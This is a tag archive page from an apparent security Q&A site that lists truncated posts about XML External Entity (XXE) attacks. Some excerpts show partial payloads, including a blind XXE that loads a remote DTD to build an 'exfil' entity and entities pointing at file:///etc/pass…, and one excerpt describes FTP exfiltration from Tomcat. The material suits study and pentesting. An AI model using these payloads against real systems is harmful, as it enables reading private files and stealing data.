xxe – Page 4 – WindowsTechs.com

XXE Exploitation

Posted on May 5, 2019 by user8255299

I just want a little help, i’m not able to exploit an XXE.

<?xml version=”1.0″ encoding=”UTF-8″?>
<response>
<list>
<listname><![CDATA[h]]><!ELEMENT r ANY ><!ENTITY sp SYSTEM “file:///e… Continue reading XXE Exploitation→

Can XXE be exploited when disallow-doctype-decl is set to true (Apache)?

Posted on April 3, 2019 by Jyosk Natalm

I found out that an endpoint of a website may be vulnerable to XXE. It is using Unmarshal as an XML parser. When I try to send a post request using common XXE payloads, I receive the following response from the server:

[org.xml.sax.SAXPa… Continue reading Can XXE be exploited when disallow-doctype-decl is set to true (Apache)?→

Researcher Says NSA’s Ghidra Tool Can Be Used for RCE

Posted on March 19, 2019 by Tara Seals

Researchers have released a proof-of-concept showing how a XXE vulnerability can be exploited to attack Ghidra project users. Continue reading Researcher Says NSA’s Ghidra Tool Can Be Used for RCE→

ASP.NET SOAP Service XXE

Posted on November 11, 2018 by Maz Ra

Is it possible to do any type of XXE in a service developed using default C# SOAP service framework?

I ask because any type of XXE payload I try to add, even XML header, whatever I add before SOAP envelope, I get 400 bad re… Continue reading ASP.NET SOAP Service XXE→

Exfiltration through FTP using XXE on a Tomcat server

Posted on November 8, 2018 by Rob Gates

I’m trying to extract binary data from a Tomcat server that is using SAXParser. For my FTP server, I am using this source. I’m hosting two DTD’s on Github Gist. These are their contents:

Base XML (What gets sent to the server):

<?xml … Continue reading Exfiltration through FTP using XXE on a Tomcat server→

javax.xml.* XXE Exploitation

Posted on November 6, 2018 by Greg Th

During a pentest engagement, I found an XXE vulnerability on a SOAP webservice written in Java, OS is Windows Server and I’m trying to demonastrate how serious the vulnerability is. The problem is, I can only read well format… Continue reading javax.xml.* XXE Exploitation→

Why do we need External dtd in blind XXE?

Posted on November 2, 2018 by janu agrawal

A proper blind XXE payload is:-

<?xml version=”1.0″ ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM “http://127.0.0.1/dtd.xml”>
%sp;
%param1;
]>
<r>&exfil;</r>

File stored on http://127.0.0… Continue reading Why do we need External dtd in blind XXE?→

XXE injection in root node of XML document

Posted on June 29, 2018 by staticFlow

So I’m on an engagement and discovered an XXE injection point in a peculiar place on a ASP.NET app that I can’t seem to get my head around. One of the post parameters controls what “form” the rest of the data is sent to, and … Continue reading XXE injection in root node of XML document→

Is .NET XmlSerializer.Deserialize(TextReader) safe?

Posted on June 27, 2018 by userx

Is the .NET method XmlSerializer.Deserialize(TextReader) safe from XML vulnerabilities (XXE, XmlBomb etc..)? Will the DTD be processed during deserialization?

I can understand why XmlSerializer.Deserialize(XmlTextReader) can… Continue reading Is .NET XmlSerializer.Deserialize(TextReader) safe?→

XXE: SYSTEM and PUBLIC are practically synonyms?

Posted on June 18, 2018 by daisy

I’m following this article and it says

SYSTEM and PUBLIC are practically synonyms

So I created an example like this

<?xml version=”1.0″ encoding=”UTF-7″?>
<!DOCTYPE root [
<!ENTITY foo PUBLIC “file:///etc/pass… Continue reading XXE: SYSTEM and PUBLIC are practically synonyms?→